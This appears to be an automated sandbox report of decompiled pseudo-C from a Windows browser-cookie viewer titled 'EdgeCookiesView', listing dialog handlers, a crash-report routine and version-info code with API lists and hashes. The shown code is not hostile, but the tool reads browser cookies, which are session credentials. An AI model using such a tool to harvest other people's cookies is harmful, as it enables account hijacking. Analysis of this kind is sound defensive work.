                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t47 = _a4 - 0x110;
                                                                                                                                                                    				_t117 = __ecx;
                                                                                                                                                                    				if(_t47 == 0) {
                                                                                                                                                                    					__eflags =  *0x412f50;
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                                                                    						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
                                                                                                                                                                    					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                                                                    					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                                                                    					E0040103E(_t117, __eflags);
                                                                                                                                                                    					E00405B17(_t106,  *(_t117 + 0x10), 4);
                                                                                                                                                                    					goto L30;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t61 = _t47 - 1;
                                                                                                                                                                    					if(_t61 == 0) {
                                                                                                                                                                    						_t103 = _a8;
                                                                                                                                                                    						_t63 = _t103 >> 0x10;
                                                                                                                                                                    						__eflags = _t103 - 1;
                                                                                                                                                                    						if(_t103 == 1) {
                                                                                                                                                                    							L24:
                                                                                                                                                                    							__eflags = _t63;
                                                                                                                                                                    							if(_t63 != 0) {
                                                                                                                                                                    								goto L30;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                                                                    								DeleteObject( *(_t117 + 0x43c));
                                                                                                                                                                    								goto L8;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							__eflags = _t103 - 2;
                                                                                                                                                                    							if(_t103 != 2) {
                                                                                                                                                                    								goto L30;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								goto L24;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t68 = _t61 - 0x27;
                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                    							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                    							__eflags = _a12 - _t69;
                                                                                                                                                                    							if(_a12 != _t69) {
                                                                                                                                                                    								__eflags =  *0x412fd0;
                                                                                                                                                                    								if( *0x412fd0 == 0) {
                                                                                                                                                                    									goto L30;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                    									__eflags = _a12 - _t70;
                                                                                                                                                                    									if(_a12 != _t70) {
                                                                                                                                                                    										goto L30;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										goto L18;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L18:
                                                                                                                                                                    								SetBkMode(_a8, 1);
                                                                                                                                                                    								SetTextColor(_a8, 0xc00000);
                                                                                                                                                                    								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t73 = _t68 - 0xc8;
                                                                                                                                                                    							if(_t73 == 0) {
                                                                                                                                                                    								_t74 = _a12;
                                                                                                                                                                    								_t96 = _t74 & 0x0000ffff;
                                                                                                                                                                    								_v12.x = _t96;
                                                                                                                                                                    								_v12.y = _t74 >> 0x10;
                                                                                                                                                                    								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                    								_push(_v12.y);
                                                                                                                                                                    								_a8 = _t76;
                                                                                                                                                                    								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                                                                    								__eflags = _t77 - _a8;
                                                                                                                                                                    								if(_t77 != _a8) {
                                                                                                                                                                    									__eflags =  *0x412fd0;
                                                                                                                                                                    									if( *0x412fd0 == 0) {
                                                                                                                                                                    										goto L30;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                    										_push(_v12.y);
                                                                                                                                                                    										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                                                                    										__eflags = _t79 - _t78;
                                                                                                                                                                    										if(_t79 != _t78) {
                                                                                                                                                                    											goto L30;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											goto L13;
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									L13:
                                                                                                                                                                    									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                                    									goto L8;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                    									L30:
                                                                                                                                                                    									_t56 = 0;
                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t85 = _a12;
                                                                                                                                                                    									_t98 = _t85 & 0x0000ffff;
                                                                                                                                                                    									_v12.x = _t98;
                                                                                                                                                                    									_v12.y = _t85 >> 0x10;
                                                                                                                                                                    									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                    									_push(_v12.y);
                                                                                                                                                                    									_a8 = _t87;
                                                                                                                                                                    									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                                                                    										__eflags =  *0x412fd0;
                                                                                                                                                                    										if( *0x412fd0 == 0) {
                                                                                                                                                                    											goto L30;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                    											_push(_v12.y);
                                                                                                                                                                    											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                                                                    											__eflags = _t90 - _t89;
                                                                                                                                                                    											if(_t90 != _t89) {
                                                                                                                                                                    												goto L30;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_push(0x412fd0);
                                                                                                                                                                    												goto L7;
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_push(_t117 + 0x23e);
                                                                                                                                                                    										L7:
                                                                                                                                                                    										_push( *(_t117 + 0x10));
                                                                                                                                                                    										E00405CD2();
                                                                                                                                                                    										L8:
                                                                                                                                                                    										_t56 = 1;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t56;
                                                                                                                                                                    			}



























                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00401263
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00401263
                                                                                                                                                                    0x0040125d
                                                                                                                                                                    0x0040121c
                                                                                                                                                                    0x0040121c
                                                                                                                                                                    0x00401221
                                                                                                                                                                    0x0040122f
                                                                                                                                                                    0x00401237
                                                                                                                                                                    0x00401237
                                                                                                                                                                    0x004010ef
                                                                                                                                                                    0x004010ef
                                                                                                                                                                    0x004010f4
                                                                                                                                                                    0x00401185
                                                                                                                                                                    0x0040118e
                                                                                                                                                                    0x0040119c
                                                                                                                                                                    0x0040119f
                                                                                                                                                                    0x004011a2
                                                                                                                                                                    0x004011a4
                                                                                                                                                                    0x004011a7
                                                                                                                                                                    0x004011b4
                                                                                                                                                                    0x004011b6
                                                                                                                                                                    0x004011b9
                                                                                                                                                                    0x004011d8
                                                                                                                                                                    0x004011e0
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004011e6
                                                                                                                                                                    0x004011ee
                                                                                                                                                                    0x004011f0
                                                                                                                                                                    0x004011fb
                                                                                                                                                                    0x004011fd
                                                                                                                                                                    0x004011ff
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00401205
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00401205
                                                                                                                                                                    0x004011ff
                                                                                                                                                                    0x004011bb
                                                                                                                                                                    0x004011bb
                                                                                                                                                                    0x004011cd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004011cd
                                                                                                                                                                    0x004010fa
                                                                                                                                                                    0x004010fc
                                                                                                                                                                    0x00401331
                                                                                                                                                                    0x00401331
                                                                                                                                                                    0x00401331
                                                                                                                                                                    0x00401102
                                                                                                                                                                    0x00401102
                                                                                                                                                                    0x0040110b
                                                                                                                                                                    0x00401119
                                                                                                                                                                    0x0040111c
                                                                                                                                                                    0x0040111f
                                                                                                                                                                    0x00401121
                                                                                                                                                                    0x00401124
                                                                                                                                                                    0x00401136
                                                                                                                                                                    0x00401151
                                                                                                                                                                    0x00401159
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040115f
                                                                                                                                                                    0x00401167
                                                                                                                                                                    0x00401169
                                                                                                                                                                    0x00401174
                                                                                                                                                                    0x00401176
                                                                                                                                                                    0x00401178
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040117e
                                                                                                                                                                    0x0040117e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040117e
                                                                                                                                                                    0x00401178
                                                                                                                                                                    0x00401138
                                                                                                                                                                    0x0040113e
                                                                                                                                                                    0x0040113f
                                                                                                                                                                    0x0040113f
                                                                                                                                                                    0x00401142
                                                                                                                                                                    0x00401149
                                                                                                                                                                    0x0040114b
                                                                                                                                                                    0x0040114b
                                                                                                                                                                    0x00401136
                                                                                                                                                                    0x004010fc
                                                                                                                                                                    0x004010f4
                                                                                                                                                                    0x004010e9
                                                                                                                                                                    0x004010e0
                                                                                                                                                                    0x00401337

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                    • String ID: EdgeCookiesView
                                                                                                                                                                    • API String ID: 829165378-2656830938
                                                                                                                                                                    • Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                                    • Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
                                                                                                                                                                    • Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                                    • Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                    			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                                                                    				void _v259;
                                                                                                                                                                    				void _v260;
                                                                                                                                                                    				void _v515;
                                                                                                                                                                    				void _v516;
                                                                                                                                                                    				char _v1048;
                                                                                                                                                                    				void _v1052;
                                                                                                                                                                    				void _v1056;
                                                                                                                                                                    				void _v1560;
                                                                                                                                                                    				long _v1580;
                                                                                                                                                                    				void _v3626;
                                                                                                                                                                    				char _v3628;
                                                                                                                                                                    				void _v5674;
                                                                                                                                                                    				char _v5676;
                                                                                                                                                                    				void _v9770;
                                                                                                                                                                    				short _v9772;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				int _t61;
                                                                                                                                                                    				int _t63;
                                                                                                                                                                    				int _t64;
                                                                                                                                                                    				long _t68;
                                                                                                                                                                    				struct HWND__* _t94;
                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                    				unsigned int _t130;
                                                                                                                                                                    				void* _t132;
                                                                                                                                                                    				void* _t135;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2628, __ecx);
                                                                                                                                                                    				_t45 = _a8 - 0x110;
                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                    					E00405B17(__edx, _a4, 4);
                                                                                                                                                                    					_v9772 = 0;
                                                                                                                                                                    					memset( &_v9770, 0, 0xffe);
                                                                                                                                                                    					_t103 = 5;
                                                                                                                                                                    					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                                                                    					memset( &_v1560, 0, 0x1f6);
                                                                                                                                                                    					_v260 = 0;
                                                                                                                                                                    					memset( &_v259, 0, 0xff);
                                                                                                                                                                    					_v516 = 0;
                                                                                                                                                                    					memset( &_v515, 0, 0xff);
                                                                                                                                                                    					_v5676 = 0;
                                                                                                                                                                    					memset( &_v5674, 0, 0x7fe);
                                                                                                                                                                    					_v3628 = 0;
                                                                                                                                                                    					memset( &_v3626, 0, 0x7fe);
                                                                                                                                                                    					_t135 = _t132 + 0x5c;
                                                                                                                                                                    					_t60 = GetCurrentProcess();
                                                                                                                                                                    					_t105 =  &_v260;
                                                                                                                                                                    					_a8 = _t60;
                                                                                                                                                                    					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
                                                                                                                                                                    					__eflags = _t61;
                                                                                                                                                                    					if(_t61 != 0) {
                                                                                                                                                                    						E00405D33( &_v5676,  &_v260, 4);
                                                                                                                                                                    						_pop(_t105);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
                                                                                                                                                                    					__eflags = _t63;
                                                                                                                                                                    					if(_t63 != 0) {
                                                                                                                                                                    						E00405D33( &_v3628,  &_v516, 0);
                                                                                                                                                                    						_pop(_t105);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t64 = E0040591F();
                                                                                                                                                                    					__eflags = _t64;
                                                                                                                                                                    					if(_t64 == 0) {
                                                                                                                                                                    						E0040C9D6();
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E0040CA5A();
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags =  *0x41325c; // 0x0
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						L17:
                                                                                                                                                                    						_v1056 = 0;
                                                                                                                                                                    						memset( &_v1052, 0, 0x218);
                                                                                                                                                                    						_t127 =  *0x412674; // 0x0
                                                                                                                                                                    						_t135 = _t135 + 0xc;
                                                                                                                                                                    						_t68 = GetCurrentProcessId();
                                                                                                                                                                    						_push(_t127);
                                                                                                                                                                    						_push(_t68);
                                                                                                                                                                    						 *0x4128ec = 0;
                                                                                                                                                                    						E0040CBD8(_t105, __eflags);
                                                                                                                                                                    						__eflags =  *0x4128ec; // 0x0
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							memcpy( &_v1056, 0x4128f0, 0x21c);
                                                                                                                                                                    							_t135 = _t135 + 0xc;
                                                                                                                                                                    							__eflags =  *0x4128ec; // 0x0
                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                    								wcscpy( &_v1580, E00405888( &_v1048));
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L20;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						__eflags =  *0x413260; // 0x0
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							L20:
                                                                                                                                                                    							_push( &_v3628);
                                                                                                                                                                    							_push( &_v5676);
                                                                                                                                                                    							_push( *0x412450);
                                                                                                                                                                    							_push( *0x41245c);
                                                                                                                                                                    							_push( *0x41244c);
                                                                                                                                                                    							_push( *0x412434);
                                                                                                                                                                    							_push( *0x412438);
                                                                                                                                                                    							_push( *0x412440);
                                                                                                                                                                    							_push( *0x412444);
                                                                                                                                                                    							_push( *0x41243c);
                                                                                                                                                                    							_push( *0x412448);
                                                                                                                                                                    							_push( &_v1580);
                                                                                                                                                                    							_push( *0x412674);
                                                                                                                                                                    							_push( *0x412668);
                                                                                                                                                                    							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                                                                    							_push(0x800);
                                                                                                                                                                    							_push( &_v9772);
                                                                                                                                                                    							L0040DFD6();
                                                                                                                                                                    							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                                                                    							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                                                                    							L21:
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L17;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t45 == 1) {
                                                                                                                                                                    					_t130 = _a12;
                                                                                                                                                                    					if(_t130 >> 0x10 == 0) {
                                                                                                                                                                    						if(_t130 == 3) {
                                                                                                                                                                    							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                                                                    							_a4 = _t94;
                                                                                                                                                                    							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                                                                    							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                                                                    							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L21;
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
                                                                                                                                                                    • {Unknown}, xrefs: 0040C191
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                    • Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                                    • Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
                                                                                                                                                                    • Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                                    • Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                    			E0040DE36(intOrPtr* __edi, short* _a4) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				void* _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				int _v20;
                                                                                                                                                                    				long _v60;
                                                                                                                                                                    				char _v572;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				int _t47;
                                                                                                                                                                    				void* _t50;
                                                                                                                                                                    				signed short* _t76;
                                                                                                                                                                    				void* _t81;
                                                                                                                                                                    				void* _t84;
                                                                                                                                                                    				intOrPtr* _t96;
                                                                                                                                                                    				int _t97;
                                                                                                                                                                    
                                                                                                                                                                    				_t96 = __edi;
                                                                                                                                                                    				_t97 = 0;
                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                    				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                                                                    				_v8 = _t47;
                                                                                                                                                                    				if(_t47 > 0) {
                                                                                                                                                                    					_t50 = E0040674D(__edi);
                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                    					L0040E038();
                                                                                                                                                                    					_t84 = _t50;
                                                                                                                                                                    					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                                                                    					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                                                                    						_t81 = _v12;
                                                                                                                                                                    						_t11 = _t81 + 0x30; // 0x6cdfe853
                                                                                                                                                                    						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                                                                    						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                                                                    						 *__edi =  *_t13;
                                                                                                                                                                    						_t14 = _t81 + 0x14; // 0x5900006c
                                                                                                                                                                    						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                                                                    						_t16 = _t81 + 0x10; // 0xfee850ff
                                                                                                                                                                    						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                                                                    						_t18 = _t81 + 0x24; // 0x38680000
                                                                                                                                                                    						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                                                                    						_t20 = _t81 + 0x28; // 0xbb0040fa
                                                                                                                                                                    						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                                                                    					}
                                                                                                                                                                    					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                                                                    						L5:
                                                                                                                                                                    						wcscpy( &_v60, L"040904E4");
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t76 = _v16;
                                                                                                                                                                    						_push(_t76[1] & 0x0000ffff);
                                                                                                                                                                    						_push( *_t76 & 0x0000ffff);
                                                                                                                                                                    						_push(L"%4.4X%4.4X");
                                                                                                                                                                    						_push(0x14);
                                                                                                                                                                    						_push( &_v60);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
                                                                                                                                                                    							goto L5;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                                                                    					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                                                                    					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                                                                    					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                                                                    					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                                                                    					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                                                                    					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                                                                    					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                                                                    					_push(_t84);
                                                                                                                                                                    					_t97 = 1;
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t97;
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                                    • GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                                    • VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040DFC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                    • API String ID: 1223191525-1542517562
                                                                                                                                                                    • Opcode ID: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
                                                                                                                                                                    • Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
                                                                                                                                                                    • Opcode Fuzzy Hash: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
                                                                                                                                                                    • Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                    			E004099C4(void* __eax) {
                                                                                                                                                                    				struct _SHFILEINFOW _v692;
                                                                                                                                                                    				void _v1214;
                                                                                                                                                                    				short _v1216;
                                                                                                                                                                    				void* _v1244;
                                                                                                                                                                    				void* _v1248;
                                                                                                                                                                    				void* _v1252;
                                                                                                                                                                    				void* _v1256;
                                                                                                                                                                    				void* _v1268;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    				long _t38;
                                                                                                                                                                    				long _t46;
                                                                                                                                                                    				long _t48;
                                                                                                                                                                    				long _t58;
                                                                                                                                                                    				void* _t62;
                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                    
                                                                                                                                                                    				_t64 = ImageList_Create;
                                                                                                                                                                    				_t62 = __eax;
                                                                                                                                                                    				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
                                                                                                                                                                    					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
                                                                                                                                                                    						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                    						 *(_t62 + 0x2b4) = _t48;
                                                                                                                                                                    						__imp__ImageList_SetImageCount(_t48, 1);
                                                                                                                                                                    						_push( *(_t62 + 0x2b4));
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v692.hIcon = 0;
                                                                                                                                                                    						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                                                                    						_v1216 = 0;
                                                                                                                                                                    						memset( &_v1214, 0, 0x208);
                                                                                                                                                                    						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                                                                    						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                                                                    						 *(_t62 + 0x2b4) = _t58;
                                                                                                                                                                    						_push(_t58);
                                                                                                                                                                    					}
                                                                                                                                                                    					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
                                                                                                                                                                    					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                                    					 *(_t62 + 0x2b8) = _t46;
                                                                                                                                                                    					__imp__ImageList_SetImageCount(_t46, 1);
                                                                                                                                                                    					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                    				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                    				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                    				_v1244 = _t37;
                                                                                                                                                                    				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
                                                                                                                                                                    				_t38 = GetSysColor(0xf);
                                                                                                                                                                    				_v1248 = _t38;
                                                                                                                                                                    				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
